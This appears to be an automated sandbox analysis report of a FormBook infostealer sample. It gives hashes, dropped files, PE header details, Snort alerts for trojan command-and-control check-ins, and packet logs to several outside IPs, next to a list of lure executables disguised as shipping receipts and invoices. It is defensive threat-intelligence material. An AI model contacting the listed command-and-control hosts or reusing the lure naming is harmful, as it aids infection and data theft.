                                                  ONECOMDKDHL Receipt_AWB#20240079104.exeGet hashmaliciousFormBookBrowse
                                                  • 46.30.211.38
                                                  AWB 112-17259653.exeGet hashmaliciousFormBookBrowse
                                                  • 46.30.211.38
                                                  scan19062024.exeGet hashmaliciousFormBookBrowse
                                                  • 46.30.215.104
                                                  DHL Arrival Notice.exeGet hashmaliciousFormBookBrowse
                                                  • 46.30.211.38
                                                  Fiyat ARH-43010386.pdf2400120887000033208 'd#U0131r. PO 1310098007.exeGet hashmaliciousFormBookBrowse
                                                  • 46.30.211.38
                                                  8eBzSB5cmamfLKJ.exeGet hashmaliciousFormBookBrowse
                                                  • 46.30.215.51
                                                  Document TOP19928.exeGet hashmaliciousFormBookBrowse
                                                  • 46.30.213.191
                                                  Urgent Quotation_pdf.exeGet hashmaliciousFormBookBrowse
                                                  • 46.30.215.51
                                                  FedEx Receipt_AWB# 102003550412.exeGet hashmaliciousFormBookBrowse
                                                  • 46.30.211.38
                                                  Salary Raise.exeGet hashmaliciousFormBookBrowse
                                                  • 46.30.211.38

                                                  JA3 Fingerprints

                                                  No context

                                                  Dropped Files

                                                  No context

                                                  Created / dropped Files

                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\8hd98EhtIFcYkb8.exe.log

                                                  Download File
                                                  Process:C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1216
                                                  Entropy (8bit):5.34331486778365
                                                  Encrypted:false
                                                  SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                  MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                  SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                  SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                  SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                  Malicious:true
                                                  Reputation:high, very likely benign file
                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\aj34fjqh.exe.log

                                                  Download File
                                                  Process:C:\Users\user\AppData\Local\Temp\aj34fjqh.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1500
                                                  Entropy (8bit):5.345358309061185
                                                  Encrypted:false
                                                  SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPE4KMRaKIE4oKNzKoZAE4Kze0E4VE4x84j:MIHK5HKH1qHiYHKh3oPHKMRatHo6hAHQ
                                                  MD5:215B3562F83C4FB9BBB129D2F9E59ADA
                                                  SHA1:0534A53F6F42ECA7E56EB02E328A2025254AC511
                                                  SHA-256:4CF4451F940D8D730D8209079E1404A1EAD1A36C33E69AB8AE43E0E7D33B4450
                                                  SHA-512:E09A97CE89258E1BCDA4832E1348720EBCD462E0C81736CCAD8D99AB1AC60ECBAF5E1F552C4F0977F498D25E27739197D2A9C1EFFDEB7116020D106231EB7C43
                                                  Malicious:false
                                                  Reputation:moderate, very likely benign file
                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Data, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Data\1b8c564fd69668e6e62d136259980d9e\System.Data.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fc

                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\EuOdzX7Ehz6t1H3[1].exe

                                                  Download File
                                                  Process:C:\Windows\SysWOW64\chkntfs.exe
                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):698880
                                                  Entropy (8bit):7.911230439704249
                                                  Encrypted:false
                                                  SSDEEP:12288:199glhtybCaw7zjHIWpMnAzN0D5qZboic6R+cye27TXFzLH0Z:19w3DXMKKqZbtRDyzXRL
                                                  MD5:A000A790579BE8EDD044A668469EA33E
                                                  SHA1:CA2DB74AAABF250A375010E9039CBAA85BFA0074
                                                  SHA-256:CB0C396BC52A0550F80BCC4EA4930DD07D1A308CB8FE4A9200F92C06B7E71EAA
                                                  SHA-512:952CCD18E119068271A4D67A08D36C922C35D0FD51678C63B45F021C534A82521A99B2AB6CFA33D36839449DB6934DFBD3BA88C0968D229CE0E5B526A1469F99
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  Reputation:low
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.... ...............0.................. ........@.. ....................................@.................................l...O...................................@...p............................................ ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H..........,l..............@.............................................r...ps....}......}.....(.......(.....*.0............{....o.....r...p.{....s......o.....+...{....o......o....o....&..o........-..{....o......{....o.....r...p.{....s......o.....8......{....o....r...po ...o!...r...p......%...o.....o"...&.{....o....r...po ...o!...r...p......%...o.....o"...&.{....o....r...po ...o!...r...p......%...o.....o"...&.{....o....r...po ...o!...r...p......%...o.....o"...&.{....o....r.

                                                  C:\Users\user\AppData\Local\Temp\aj34fjqh.exe

                                                  Download File
                                                  Process:C:\Windows\SysWOW64\chkntfs.exe
                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:modified
                                                  Size (bytes):698880
                                                  Entropy (8bit):7.911230439704249
                                                  Encrypted:false
                                                  SSDEEP:12288:199glhtybCaw7zjHIWpMnAzN0D5qZboic6R+cye27TXFzLH0Z:19w3DXMKKqZbtRDyzXRL
                                                  MD5:A000A790579BE8EDD044A668469EA33E
                                                  SHA1:CA2DB74AAABF250A375010E9039CBAA85BFA0074
                                                  SHA-256:CB0C396BC52A0550F80BCC4EA4930DD07D1A308CB8FE4A9200F92C06B7E71EAA
                                                  SHA-512:952CCD18E119068271A4D67A08D36C922C35D0FD51678C63B45F021C534A82521A99B2AB6CFA33D36839449DB6934DFBD3BA88C0968D229CE0E5B526A1469F99
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  Reputation:low
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.... ...............0.................. ........@.. ....................................@.................................l...O...................................@...p............................................ ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H..........,l..............@.............................................r...ps....}......}.....(.......(.....*.0............{....o.....r...p.{....s......o.....+...{....o......o....o....&..o........-..{....o......{....o.....r...p.{....s......o.....8......{....o....r...po ...o!...r...p......%...o.....o"...&.{....o....r...po ...o!...r...p......%...o.....o"...&.{....o....r...po ...o!...r...p......%...o.....o"...&.{....o....r...po ...o!...r...p......%...o.....o"...&.{....o....r.

                                                  C:\Users\user\AppData\Local\Temp\j77tfG6

                                                  Download File
                                                  Process:C:\Windows\SysWOW64\chkntfs.exe
                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                  Category:dropped
                                                  Size (bytes):196608
                                                  Entropy (8bit):1.1215420383712111
                                                  Encrypted:false
                                                  SSDEEP:384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
                                                  MD5:9A809AD8B1FDDA60760BB6253358A1DB
                                                  SHA1:D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
                                                  SHA-256:95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
                                                  SHA-512:2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
                                                  Malicious:false
                                                  Reputation:moderate, very likely benign file
                                                  Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                  Static File Info

                                                  General

                                                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Entropy (8bit):7.9490261556051545
                                                  TrID:
                                                  • Win32 Executable (generic) Net Framework (10011505/4) 49.79%
                                                  • Win32 Executable (generic) a (10002005/4) 49.75%
                                                  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                  • Windows Screen Saver (13104/52) 0.07%
                                                  • Win16/32 Executable Delphi generic (2074/23) 0.01%
                                                  File name:8hd98EhtIFcYkb8.exe
                                                  File size:686'080 bytes
                                                  MD5:677b2d2d3a54e0c1d8e416b276093fb3
                                                  SHA1:22b6aa9e97cf16d55aa16dcc20fea67f9806d09c
                                                  SHA256:c42f31c68ee4a14aec74ddce249314d00813289dc36740484b09ceadf72aa0f8
                                                  SHA512:43dba02ce5e096eaf44a6a623737b89a8d89e98995b7bdfa7f17a8e4f0e93417c0a63c4a066f760a1c762e5d058461bf4af6d31c949b7d5bf2f4d7b750921945
                                                  SSDEEP:12288:Efqy6lRPMqNMCXnIfd8SLLov+I6rDqAgdf3Gqsrj0Tfh3PFvwxgpNQKA5Go5tdZ:oIRVV3e7LI6vQMj0Tfh26NQco5td
                                                  TLSH:FDE422A032386567CBBDAAF54429250517F265AA1C02FBCD0DD120CF4EDAF511E21BBB
                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f..............0..P... .......o... ........@.. ....................................@................................

                                                  File Icon

                                                  Icon Hash:6145b2b1e4a4b186

                                                  Static PE Info

                                                  General

                                                  Entrypoint:0x4a6f8e
                                                  Entrypoint Section:.text
                                                  Digitally signed:false
                                                  Imagebase:0x400000
                                                  Subsystem:windows gui
                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                  Time Stamp:0x6682B3A3 [Mon Jul 1 13:48:19 2024 UTC]
                                                  TLS Callbacks:
                                                  CLR (.Net) Version:
                                                  OS Version Major:4
                                                  OS Version Minor:0
                                                  File Version Major:4
                                                  File Version Minor:0
                                                  Subsystem Version Major:4
                                                  Subsystem Version Minor:0
                                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                  Entrypoint Preview

                                                  Instruction
                                                  jmp dword ptr [00402000h]
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al

                                                  Data Directories

                                                  NameVirtual AddressVirtual Size Is in Section
                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0xa6f3c0x4f.text
                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0xa80000x16b4.rsrc
                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0xaa0000xc.reloc
                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                  Sections

                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                  .text0x20000xa4f940xa50003bfe6521eaaf36ce8403db72969bafdaFalse0.952047821969697data7.968066969388496IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                  .rsrc0xa80000x16b40x1800432891cdc11b1dfbccff772b61a11647False0.8050130208333334data7.037788378482379IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                  .reloc0xaa0000xc0x80006acc8b2d6f8a370378fd25813a22048False0.015625data0.03037337037012526IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                  Resources

                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                  RT_ICON0xa80c80x129fPNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9418921753723516
                                                  RT_GROUP_ICON0xa93780x14data1.05
                                                  RT_VERSION0xa939c0x312data0.43638676844783714

                                                  Imports

                                                  DLLImport
                                                  mscoree.dll_CorExeMain

                                                  Network Behavior

                                                  Snort IDS Alerts

                                                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                  07/01/24-19:25:38.686378TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M26447580192.168.2.7192.250.231.28
                                                  07/01/24-19:25:25.124461TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M26447180192.168.2.774.208.236.162
                                                  07/01/24-19:27:00.696487TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M26449680192.168.2.738.207.19.49
                                                  07/01/24-19:26:19.230746TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M26448480192.168.2.743.198.80.127
                                                  07/01/24-19:24:15.086308TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M26445980192.168.2.7172.67.194.145
                                                  07/01/24-19:25:11.804732TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M26446780192.168.2.746.30.215.51
                                                  07/01/24-19:26:00.592496TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M26447980192.168.2.7162.0.238.43
                                                  07/01/24-19:26:46.825321TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M26449280192.168.2.791.195.240.123
                                                  07/01/24-19:24:37.172413TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M26446380192.168.2.738.55.194.30
                                                  07/01/24-19:23:35.528269TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24971280192.168.2.7217.160.0.31
                                                  07/01/24-19:26:33.240207TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M26448880192.168.2.745.130.41.249

                                                  Network Port Distribution

                                                  TCP Packets

                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Jul 1, 2024 19:23:35.520992041 CEST4971280192.168.2.7217.160.0.31
                                                  Jul 1, 2024 19:23:35.525859118 CEST8049712217.160.0.31192.168.2.7
                                                  Jul 1, 2024 19:23:35.525947094 CEST4971280192.168.2.7217.160.0.31
                                                  Jul 1, 2024 19:23:35.528269053 CEST4971280192.168.2.7217.160.0.31
                                                  Jul 1, 2024 19:23:35.534359932 CEST8049712217.160.0.31192.168.2.7
                                                  Jul 1, 2024 19:23:36.188384056 CEST8049712217.160.0.31192.168.2.7
                                                  Jul 1, 2024 19:23:36.188941002 CEST8049712217.160.0.31192.168.2.7
                                                  Jul 1, 2024 19:23:36.189007998 CEST4971280192.168.2.7217.160.0.31
                                                  Jul 1, 2024 19:23:36.191472054 CEST4971280192.168.2.7217.160.0.31
                                                  Jul 1, 2024 19:23:36.197282076 CEST8049712217.160.0.31192.168.2.7
                                                  Jul 1, 2024 19:24:07.457382917 CEST6445680192.168.2.7172.67.194.145
                                                  Jul 1, 2024 19:24:07.462654114 CEST8064456172.67.194.145192.168.2.7
                                                  Jul 1, 2024 19:24:07.462753057 CEST6445680192.168.2.7172.67.194.145
                                                  Jul 1, 2024 19:24:07.464421034 CEST6445680192.168.2.7172.67.194.145
                                                  Jul 1, 2024 19:24:07.475584984 CEST8064456172.67.194.145192.168.2.7
                                                  Jul 1, 2024 19:24:08.160142899 CEST8064456172.67.194.145192.168.2.7
                                                  Jul 1, 2024 19:24:08.160259008 CEST8064456172.67.194.145192.168.2.7
                                                  Jul 1, 2024 19:24:08.160316944 CEST6445680192.168.2.7172.67.194.145
                                                  Jul 1, 2024 19:24:08.966594934 CEST6445680192.168.2.7172.67.194.145
                                                  Jul 1, 2024 19:24:09.985390902 CEST6445780192.168.2.7172.67.194.145
                                                  Jul 1, 2024 19:24:10.021394014 CEST8064457172.67.194.145192.168.2.7
                                                  Jul 1, 2024 19:24:10.021486044 CEST6445780192.168.2.7172.67.194.145
                                                  Jul 1, 2024 19:24:10.023534060 CEST6445780192.168.2.7172.67.194.145
                                                  Jul 1, 2024 19:24:10.028964996 CEST8064457172.67.194.145192.168.2.7
                                                  Jul 1, 2024 19:24:10.762649059 CEST8064457172.67.194.145192.168.2.7
                                                  Jul 1, 2024 19:24:10.763577938 CEST8064457172.67.194.145192.168.2.7
                                                  Jul 1, 2024 19:24:10.763643980 CEST6445780192.168.2.7172.67.194.145
                                                  Jul 1, 2024 19:24:10.766004086 CEST8064457172.67.194.145192.168.2.7
                                                  Jul 1, 2024 19:24:10.766061068 CEST6445780192.168.2.7172.67.194.145
                                                  Jul 1, 2024 19:24:11.529133081 CEST6445780192.168.2.7172.67.194.145
                                                  Jul 1, 2024 19:24:12.547482967 CEST6445880192.168.2.7172.67.194.145
                                                  Jul 1, 2024 19:24:12.552558899 CEST8064458172.67.194.145192.168.2.7
                                                  Jul 1, 2024 19:24:12.552676916 CEST6445880192.168.2.7172.67.194.145
                                                  Jul 1, 2024 19:24:12.554569006 CEST6445880192.168.2.7172.67.194.145
                                                  Jul 1, 2024 19:24:12.559551001 CEST8064458172.67.194.145192.168.2.7
                                                  Jul 1, 2024 19:24:12.560333967 CEST8064458172.67.194.145192.168.2.7
                                                  Jul 1, 2024 19:24:13.251588106 CEST8064458172.67.194.145192.168.2.7
                                                  Jul 1, 2024 19:24:13.251941919 CEST8064458172.67.194.145192.168.2.7
                                                  Jul 1, 2024 19:24:13.252121925 CEST6445880192.168.2.7172.67.194.145
                                                  Jul 1, 2024 19:24:14.060456038 CEST6445880192.168.2.7172.67.194.145
                                                  Jul 1, 2024 19:24:15.079236031 CEST6445980192.168.2.7172.67.194.145
                                                  Jul 1, 2024 19:24:15.084331036 CEST8064459172.67.194.145192.168.2.7
                                                  Jul 1, 2024 19:24:15.084522009 CEST6445980192.168.2.7172.67.194.145
                                                  Jul 1, 2024 19:24:15.086308002 CEST6445980192.168.2.7172.67.194.145
                                                  Jul 1, 2024 19:24:15.091320038 CEST8064459172.67.194.145192.168.2.7
                                                  Jul 1, 2024 19:24:15.787378073 CEST8064459172.67.194.145192.168.2.7
                                                  Jul 1, 2024 19:24:15.787462950 CEST8064459172.67.194.145192.168.2.7
                                                  Jul 1, 2024 19:24:15.787591934 CEST8064459172.67.194.145192.168.2.7
                                                  Jul 1, 2024 19:24:15.787642956 CEST6445980192.168.2.7172.67.194.145
                                                  Jul 1, 2024 19:24:15.788394928 CEST6445980192.168.2.7172.67.194.145
                                                  Jul 1, 2024 19:24:15.791934967 CEST6445980192.168.2.7172.67.194.145
                                                  Jul 1, 2024 19:24:15.796886921 CEST8064459172.67.194.145192.168.2.7
                                                  Jul 1, 2024 19:24:29.461313009 CEST6446080192.168.2.738.55.194.30
                                                  Jul 1, 2024 19:24:29.468151093 CEST806446038.55.194.30192.168.2.7
                                                  Jul 1, 2024 19:24:29.470961094 CEST6446080192.168.2.738.55.194.30
                                                  Jul 1, 2024 19:24:29.472742081 CEST6446080192.168.2.738.55.194.30
                                                  Jul 1, 2024 19:24:29.479617119 CEST806446038.55.194.30192.168.2.7
                                                  Jul 1, 2024 19:24:30.982315063 CEST6446080192.168.2.738.55.194.30
                                                  Jul 1, 2024 19:24:31.034789085 CEST806446038.55.194.30192.168.2.7
                                                  Jul 1, 2024 19:24:32.002028942 CEST6446180192.168.2.738.55.194.30
                                                  Jul 1, 2024 19:24:32.007523060 CEST806446138.55.194.30192.168.2.7
                                                  Jul 1, 2024 19:24:32.007632017 CEST6446180192.168.2.738.55.194.30
                                                  Jul 1, 2024 19:24:32.010243893 CEST6446180192.168.2.738.55.194.30
                                                  Jul 1, 2024 19:24:32.019553900 CEST806446138.55.194.30192.168.2.7
                                                  Jul 1, 2024 19:24:33.513750076 CEST6446180192.168.2.738.55.194.30
                                                  Jul 1, 2024 19:24:33.558654070 CEST806446138.55.194.30192.168.2.7
                                                  Jul 1, 2024 19:24:34.531841040 CEST6446280192.168.2.738.55.194.30
                                                  Jul 1, 2024 19:24:34.630631924 CEST806446238.55.194.30192.168.2.7
                                                  Jul 1, 2024 19:24:34.634516001 CEST6446280192.168.2.738.55.194.30
                                                  Jul 1, 2024 19:24:34.636476994 CEST6446280192.168.2.738.55.194.30
                                                  Jul 1, 2024 19:24:34.641371965 CEST806446238.55.194.30192.168.2.7
                                                  Jul 1, 2024 19:24:34.641544104 CEST806446238.55.194.30192.168.2.7
                                                  Jul 1, 2024 19:24:36.138555050 CEST6446280192.168.2.738.55.194.30
                                                  Jul 1, 2024 19:24:36.186701059 CEST806446238.55.194.30192.168.2.7
                                                  Jul 1, 2024 19:24:37.160430908 CEST6446380192.168.2.738.55.194.30
                                                  Jul 1, 2024 19:24:37.165349960 CEST806446338.55.194.30192.168.2.7
                                                  Jul 1, 2024 19:24:37.168514967 CEST6446380192.168.2.738.55.194.30
                                                  Jul 1, 2024 19:24:37.172413111 CEST6446380192.168.2.738.55.194.30
                                                  Jul 1, 2024 19:24:37.177685022 CEST806446338.55.194.30192.168.2.7
                                                  Jul 1, 2024 19:24:50.860143900 CEST806446038.55.194.30192.168.2.7
                                                  Jul 1, 2024 19:24:50.860532999 CEST6446080192.168.2.738.55.194.30
                                                  Jul 1, 2024 19:24:54.125679970 CEST806446138.55.194.30192.168.2.7
                                                  Jul 1, 2024 19:24:54.125736952 CEST6446180192.168.2.738.55.194.30
                                                  Jul 1, 2024 19:24:54.126128912 CEST806446138.55.194.30192.168.2.7
                                                  Jul 1, 2024 19:24:54.126178980 CEST6446180192.168.2.738.55.194.30
                                                  Jul 1, 2024 19:24:54.126626968 CEST806446138.55.194.30192.168.2.7
                                                  Jul 1, 2024 19:24:54.126682043 CEST6446180192.168.2.738.55.194.30
                                                  Jul 1, 2024 19:24:54.132226944 CEST806446138.55.194.30192.168.2.7
                                                  Jul 1, 2024 19:24:54.132237911 CEST806446138.55.194.30192.168.2.7
                                                  Jul 1, 2024 19:24:56.056518078 CEST806446238.55.194.30192.168.2.7
                                                  Jul 1, 2024 19:24:56.056569099 CEST6446280192.168.2.738.55.194.30
                                                  Jul 1, 2024 19:24:58.582581043 CEST806446338.55.194.30192.168.2.7
                                                  Jul 1, 2024 19:24:58.583019972 CEST6446380192.168.2.738.55.194.30
                                                  Jul 1, 2024 19:24:58.583889961 CEST6446380192.168.2.738.55.194.30
                                                  Jul 1, 2024 19:24:58.588865995 CEST806446338.55.194.30192.168.2.7
                                                  Jul 1, 2024 19:25:03.776302099 CEST6446480192.168.2.746.30.215.51
                                                  Jul 1, 2024 19:25:03.781223059 CEST806446446.30.215.51192.168.2.7
                                                  Jul 1, 2024 19:25:03.781305075 CEST6446480192.168.2.746.30.215.51
                                                  Jul 1, 2024 19:25:03.784488916 CEST6446480192.168.2.746.30.215.51
                                                  Jul 1, 2024 19:25:03.789437056 CEST806446446.30.215.51192.168.2.7
                                                  Jul 1, 2024 19:25:04.413290977 CEST806446446.30.215.51192.168.2.7
                                                  Jul 1, 2024 19:25:04.413851976 CEST806446446.30.215.51192.168.2.7
                                                  Jul 1, 2024 19:25:04.420448065 CEST6446480192.168.2.746.30.215.51
                                                  Jul 1, 2024 19:25:05.294903040 CEST6446480192.168.2.746.30.215.51
                                                  Jul 1, 2024 19:25:06.320223093 CEST6446580192.168.2.746.30.215.51
                                                  Jul 1, 2024 19:25:06.534404039 CEST806446546.30.215.51192.168.2.7
                                                  Jul 1, 2024 19:25:06.538366079 CEST6446580192.168.2.746.30.215.51
                                                  Jul 1, 2024 19:25:06.538366079 CEST6446580192.168.2.746.30.215.51
                                                  Jul 1, 2024 19:25:06.545190096 CEST806446546.30.215.51192.168.2.7
                                                  Jul 1, 2024 19:25:07.172175884 CEST806446546.30.215.51192.168.2.7
                                                  Jul 1, 2024 19:25:07.172501087 CEST806446546.30.215.51192.168.2.7
